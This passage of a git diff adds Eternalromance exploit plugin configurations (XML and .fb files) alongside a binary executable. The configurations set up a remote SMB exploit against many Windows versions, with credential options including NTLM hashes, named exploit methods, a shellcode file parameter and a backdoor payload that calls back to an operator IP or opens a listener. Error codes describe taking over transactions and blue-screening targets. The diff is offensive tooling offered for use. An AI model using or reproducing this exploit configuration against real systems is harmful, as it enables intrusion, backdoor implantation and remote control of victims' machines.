<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="Password" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Guest" description="Guest account">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="Password" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Blank" description="User account with no password set">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
|
||||
<parameter name="Password" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Password" description="User name and password">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
|
||||
<parameter name="Password" type="Buffer" description="Password entered as hex bytes (in unicode)"/>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="NTLM" description="User name and NTLM hash">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>4</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
|
||||
<parameter name="NtlmHash" type="Buffer" description="NTLM password hash (in hex)"/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
<paramchoice name="Protocol" description="SMB (default port 445) or NBT (default port 139)">
|
||||
<default>SMB</default>
|
||||
<paramgroup name="SMB" description="">
|
||||
<parameter name="UsingNbt" description="Boolean stating to use Nbt or not" type="Boolean" hidden="true">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="NBT" description="">
|
||||
<parameter name="UsingNbt" description="Boolean stating to use Nbt or not" type="Boolean" hidden="true">
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
<paramchoice name="Target" description="Operating System, Service Pack, of target OS">
|
||||
<paramgroup name="XP_SP0SP1_X86" description="Windows XP Sp0 and Sp1, 32-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="XP_SP2SP3_X86" description="Windows XP Sp2 and Sp3, 32-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="XP_SP1_X64" description="Windows XP Sp1, 64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="XP_SP2_X64" description="Windows XP Sp2, 64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2003_SP0" description="Windows Sever 2003 Sp0, 32-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2003_SP1" description="Windows Sever 2003 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2003_SP2" description="Windows Sever 2003 Sp2, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="VISTA_SP0" description="Windows Vista Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="VISTA_SP1" description="Windows Vista Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="VISTA_SP2" description="Windows Vista Sp2, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008_SP0" description="Windows Server 2008 Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008_SP1" description="Windows Server 2008 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008_SP2" description="Windows Server 2008 Sp2, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="WIN7_SP0" description="Windows 7 Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="WIN7_SP1" description="Windows 7 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008R2_SP0" description="Windows Server 2008 R2 Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008R2_SP1" description="Windows Server 2008 R2 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
<parameter name="TeardownBackdoorAtCompletion" description="Boolean stating whether or not to remove the backdoor following successful callback/callin" type="Boolean" hidden="true">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
|
||||
<paramchoice name="Payload" description="How the egg will behave">
|
||||
<default>Callback</default>
|
||||
|
||||
<paramgroup name="Callback" description="The egg will callback to the specified IP and Port">
|
||||
<parameter name="CallbackIp" description="Callback IP address the egg will connect to from target" type="IPv4"/>
|
||||
<parameter name="CallbackPort" description="Callback port that the egg will connect to from target" type="TcpPort">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="CallbackLocalPort" description="Callback port that we will listen on to receive the eggs connection" type="TcpPort" required="false"/>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Listener" description="The egg will open up a new listening port.">
|
||||
<parameter name="ListenPort" description="Port the egg will listen on" type="TcpPort"/>
|
||||
<parameter name="CallinPort" description="Port we connect to" type="TcpPort" required="false"/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</inputparameters>
|
||||
|
||||
<outputparameters>
|
||||
<paramchoice name="Contract"
|
||||
description="The contract fulfilled by this plugin">
|
||||
<value>StagedUpload</value>
|
||||
<paramgroup name="StagedUpload" description="">
|
||||
<parameter name="ConnectedTcp"
|
||||
description="The connected socket"
|
||||
type="Socket"/>
|
||||
<parameter name="XorMask"
|
||||
description="Masking byte"
|
||||
type="U8"/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
<parameter name="TargetOsArchitecture"
|
||||
description="The architecture of the target operating system"
|
||||
type="String"/>
|
||||
</outputparameters>
|
||||
|
||||
<errors>
|
||||
<errorcode name="ETRO_ERROR_NO_MEMORY" value="65" description="Out of memory"/>
|
||||
<errorcode name="ETRO_ERROR_INVALID_PIPE_CHOICE" value="66" description="Named pipe choice not supported"/>
|
||||
<errorcode name="ETRO_UNALIGNED_RPC_STRUCT" value="67" description="Unaligned data attempted to be sent over browser pipe"/>
|
||||
<errorcode name="ETRO_ERROR_PIPES_NOT_AVAILABLE" value="68" description="No pipes available to connect to"/>
|
||||
<errorcode name="ETRO_ERROR_WINSOCK_STARTUP" value="69" description="Winsock failed to start up"/>
|
||||
<errorcode name="ETRO_ERROR_PARAM_INIT" value="69" description="Error during parameter initialization"/>
|
||||
<errorcode name="ETRO_ERROR_TRANS_NOT_FOUND" value="70" description="Unable to find a Transaction struct with info leak"/>
|
||||
<errorcode name="ETRO_ERROR_TRANS_WRITE_OUT_OF_RANGE" value="71" description="Cannot write that far into Transaction, should have written more with WriteAndX"/>
|
||||
<errorcode name="ETRO_ERROR_TRANS_TAKEOVER_UNSUCCESSFUL" value="72" description="Memory written to was not a transaction we controlled"/>
|
||||
<errorcode name="ETRO_ERROR_OUT_OF_REMOTE_MEMORY" value="73" description="Out of memory to use in remote transaction"/>
|
||||
<errorcode name="ETRO_ERROR_UNKNOWN_TRANS_SIZE" value="74" description="Unknown transaction size detected"/>
|
||||
<errorcode name="ETRO_ERROR_NOT_ENOUGH_LEAK_DATA" value="75" description="Leak returned with less data than it should have"/>
|
||||
<errorcode name="ETRO_ERROR_STRUCT_WALK_ABORTED" value="76" description="Failed to walk structures and find Srv module"/>
|
||||
<errorcode name="ETRO_ERROR_BACKDOOR_NOT_PRESENT" value="77" description="Backdoor transaction sent but backdoor did not respond"/>
|
||||
<errorcode name="ETRO_ERROR_PAYLOAD_TOO_LARGE" value="78" description="Stage 1 payload exceeded max allowed size (0xFFFF)"/>
|
||||
<errorcode name="ETRO_ERROR_BACKDOOR_RETURNED_ERROR" value="79" description="Backdoor present but returned an error code"/>
|
||||
<errorcode name="ETRO_ERROR_BLUE_SCREENED_TARGET" value="80" description="Overwrite caused the target to blue screen"/>
|
||||
<errorcode name="ETRO_ERROR_OS_NOT_SUPPORTED" value="81" description="Offsets not available for the targeted OS"/>
|
||||
<errorcode name="ETRO_ERROR_DISPATCH_TABLE_NOT_FOUND" value="82" description="Unable to locate the dispatch table in memory"/>
|
||||
<errorcode name="ETRO_ERROR_EXPLOITATION_UNSUCCESSFUL" value="83" description="Exploit methods were tried and were not successful"/>
|
||||
<errorcode name="ETRO_ERROR_EXPLOIT_METHOD_UNSUCCESSFUL" value="84" description="Exploit method was not successful but did not crash, other methods may be tried"/>
|
||||
<errorcode name="ETRO_ERROR_INVALID_EXPLOIT_METHOD" value="85" description="Exploit method not possible for target OS"/>
|
||||
</errors>
|
||||
|
||||
<redirection>
|
||||
<local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="TargetIp"
|
||||
destport="TargetPort"
|
||||
closeoncompletion="true"/>
|
||||
<remote protocol="TCP"
|
||||
listenaddr="CallbackIp"
|
||||
listenport="CallbackPort"
|
||||
destport="CallbackLocalPort"/>
|
||||
</redirection>
|
||||
|
||||
<logic>
|
||||
<and>
|
||||
<service name="smb">
|
||||
<bindtovalue name="Protocol" value="SMB"/>
|
||||
<bindtopath name="TargetPort" path="//service[name='smb']/port"/>
|
||||
</service>
|
||||
<or>
|
||||
<os family="windows" name="Windows XP">
|
||||
<bindtovalue name="Target" value="XP"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="W2K3SP0"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="1" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="W2K3SP1"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="2" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="W2K3SP2"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows XP" servicepack="1" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP1"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows XP" servicepack="2" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP2"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="1" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP1"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="2" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP2"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows Vista" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows Vista" servicepack="1" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows Vista" servicepack="2" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008" servicepack="1" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008" servicepack="2" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008 R2" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 7" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
</or>
|
||||
</and>
|
||||
</logic>
|
||||
|
||||
</config>
|
||||
BIN
windows/exploits/Eternalromance-1.3.0.exe
Normal file
BIN
windows/exploits/Eternalromance-1.3.0.exe
Normal file
Binary file not shown.
21
windows/exploits/Eternalromance-1.3.0.fb
Normal file
21
windows/exploits/Eternalromance-1.3.0.fb
Normal file
|
|
@ -0,0 +1,21 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="7fca44399ae06e52cb50bfdf9ce6bd0f2ed5d28b"
|
||||
name="Eternalromance"
|
||||
version="1.3.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:touchlist>
|
||||
<t:plugin name="Smbtouch"
|
||||
displayname="ETRO Vulnerability Touch"
|
||||
description="Check if Target is vulnerable to ETRO">
|
||||
<t:oparam name="Target" value="Target"/>
|
||||
<t:oparam name="TargetOsArchitecture" value="TargetOsArchitecture"/>
|
||||
<t:oparam name="PipeName" value="PipeName"/>
|
||||
<t:oparam name="ShareName" value="ShareName"/>
|
||||
<t:oparam name="Credentials" value="Credentials"/>
|
||||
<t:oparam name="Username" value="Username"/>
|
||||
<t:oparam name="Password" value="Password"/>
|
||||
<t:oparam name="NtlmHash" value="NtlmHash"/>
|
||||
</t:plugin>
|
||||
</t:touchlist>
|
||||
</t:config>
|
||||
426
windows/exploits/Eternalromance-1.4.0.0.xml
Normal file
426
windows/exploits/Eternalromance-1.4.0.0.xml
Normal file
|
|
@ -0,0 +1,426 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<config xmlns="urn:trch"
|
||||
id="df1cc1973caa2c3e1bbe4d2e48ffd23e50e4e428"
|
||||
name="Eternalromance"
|
||||
version="1.4.0"
|
||||
configversion="1.4.0.0"
|
||||
schemaversion="2.0.0">
|
||||
<inputparameters>
|
||||
<!-- All plugins that perform blocking network calls must have a NetworkTimeout
|
||||
parameter or its equivalent -->
|
||||
<parameter name="NetworkTimeout"
|
||||
description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
|
||||
type="S16">
|
||||
<default>60</default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="TargetIp"
|
||||
description="Target IP Address"
|
||||
type="IPv4"/>
|
||||
|
||||
<parameter name="TargetPort" description="Target TCP port" type="TcpPort">
|
||||
<default>445</default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="MaxExploitAttempts"
|
||||
description="Number of tries to exploit. Default 3"
|
||||
type="U32"
|
||||
hidden="true">
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="PipeName"
|
||||
description="The named pipe to use"
|
||||
type="String">
|
||||
</parameter>
|
||||
|
||||
<paramchoice name="ExploitMethod" description="Which exploit method to use">
|
||||
<default>Default</default>
|
||||
|
||||
<paramgroup name="Default" description="Use the best exploit method(s) for the target OS">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Fish-in-a-barrel" description="Most reliable exploit method (XP/2k3 only)">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Matched-pairs" description="Next reliable exploit method (XP/Win7/2k8R2 only)">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Classic-Romance" description="Original LargePageGroom exploit method (All OS Versions)">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
<parameter name="ShellcodeFile"
|
||||
xdevmap="EXPLOIT_SHELLCODE"
|
||||
description="DOPU (ensure correct architecture) ONLY! Other shellcode will likely BSOD."
|
||||
type="LocalFile"/>
|
||||
|
||||
<paramchoice name="Credentials" description="Type of credentials to use">
|
||||
<default>Anonymous</default>
|
||||
|
||||
<paramgroup name="Anonymous" description="Anonymous (NULL session)">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="Password" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Guest" description="Guest account">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="Password" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Blank" description="User account with no password set">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
|
||||
<parameter name="Password" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Password" description="User name and password">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
|
||||
<parameter name="Password" type="Buffer" description="Password entered as hex bytes (in unicode)"/>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="NTLM" description="User name and NTLM hash">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>4</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
|
||||
<parameter name="NtlmHash" type="Buffer" description="NTLM password hash (in hex)"/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
<paramchoice name="Protocol" description="SMB (default port 445) or NBT (default port 139)">
|
||||
<default>SMB</default>
|
||||
<paramgroup name="SMB" description="">
|
||||
<parameter name="UsingNbt" description="Boolean stating to use Nbt or not" type="Boolean" hidden="true">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="NBT" description="">
|
||||
<parameter name="UsingNbt" description="Boolean stating to use Nbt or not" type="Boolean" hidden="true">
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
<paramchoice name="Target" description="Operating System, Service Pack, of target OS">
|
||||
<paramgroup name="XP_SP0SP1_X86" description="Windows XP Sp0 and Sp1, 32-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="XP_SP2SP3_X86" description="Windows XP Sp2 and Sp3, 32-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="XP_SP1_X64" description="Windows XP Sp1, 64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="XP_SP2_X64" description="Windows XP Sp2, 64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2003_SP0" description="Windows Sever 2003 Sp0, 32-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2003_SP1" description="Windows Sever 2003 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2003_SP2" description="Windows Sever 2003 Sp2, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="VISTA_SP0" description="Windows Vista Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="VISTA_SP1" description="Windows Vista Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
